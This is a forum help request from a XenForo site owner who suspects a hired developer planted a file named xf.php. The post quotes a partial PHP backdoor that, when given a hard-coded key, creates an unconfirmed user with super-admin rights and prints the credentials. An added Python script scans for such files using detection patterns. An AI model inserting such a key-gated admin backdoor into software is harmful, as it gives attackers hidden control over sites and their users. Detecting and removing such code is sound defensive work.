XF 2.2 xenforo developer may have added an exploit file

MR X

Active member
So I hired a dev on Fiverr to make me an addon. It took way too long to complete by the time frame, so I fired him, then some time later re-hired him to actually finish it. Garbage work was done, but apparently he may or may not have uploaded a file named xf.php in /home/domain-name/public_html/data/xf.php. This is not an official XenForo file, is it? Because within it is:

PHP:
if ($key == 'dfdasfasfsjd544fjjkl') {
    // Create a new user with random credentials
    $registration = \XF::service('XF:User\Registration');
    $input['username'] = $randomString;
    $input['email'] = "$randomString@gmail.com";
    $input['password'] = $randomString;
    $registration->setFromInput($input);
    $registration->skipEmailConfirmation(true);
    $user = $registration->save();

    // Force admin privileges
    $user->secondary_group_ids = [3, 8, 5];  // Elevated groups
    $admin = \XF::app()->em()->create('XF:Admin');
    $admin->user_id = $user->user_id;
    $input['is_super_admin'] = true;
    $form->basicEntitySave($admin, $input);
    $form->run();

    echo $randomString;  // Prints the generated credentials
}

That is just the gist of what all was in it.

Appreciate some support, thank you.
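
For anyone triaging the same situation, an added example (not part of the original post and not XenForo's own tooling): a Python script that lists every PHP file under the forum's data directory and notes which of the calls from the quoted snippet each one contains. It assumes that directory should hold no PHP files at all; the marker names, the `scan()`/`demo()` helpers and the sample tree are constructed for illustration.

```python
import os
import re
import tempfile

# Markers from the snippet quoted in the post. Each is ordinary XenForo API
# usage on its own, so a hit means "review this file", not "confirmed backdoor".
MARKERS = {
    "creates user": re.compile(r"XF:User\\+Registration"),
    "skips email confirmation": re.compile(r"skipEmailConfirmation\s*\(\s*true"),
    "creates admin record": re.compile(r"create\(\s*['\"]XF:Admin['\"]"),
    "sets super admin": re.compile(r"is_super_admin"),
    "sets secondary groups": re.compile(r"secondary_group_ids\s*="),
}
PHP_EXT = (".php", ".phtml", ".phar", ".php5", ".php7")


def scan(data_dir):
    """List (relative_path, [marker names]) for each PHP file under data_dir."""
    findings = []  # assumption: any PHP file here is unexpected, marker or not
    for folder, _dirs, files in os.walk(data_dir):
        for name in files:
            if name.lower().endswith(PHP_EXT):
                path = os.path.join(folder, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
                hits = [label for label, rx in MARKERS.items() if rx.search(text)]
                findings.append((os.path.relpath(path, data_dir), hits))
    return sorted(findings)


def demo():
    """Run scan() over a constructed directory tree (sample data only)."""
    samples = {
        "avatars/1.jpg": "not php",
        "avatars/thumb.PHP": "<?php echo 1;",
        "xf.php": "<?php $r = \\XF::service('XF:User\\Registration');\n"
                  "$r->skipEmailConfirmation(true);\n"
                  "$a = \\XF::app()->em()->create('XF:Admin');",
    }
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "avatars"))
        for rel, body in samples.items():
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan(root)


if __name__ == "__main__":
    for rel, hits in demo():
        print(rel, "->", ", ".join(hits) or "unexpected PHP file, no marker")
```

To run it against a real install, call `scan()` with the path to the data directory, for example the `/home/domain-name/public_html/data` path from the post.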
 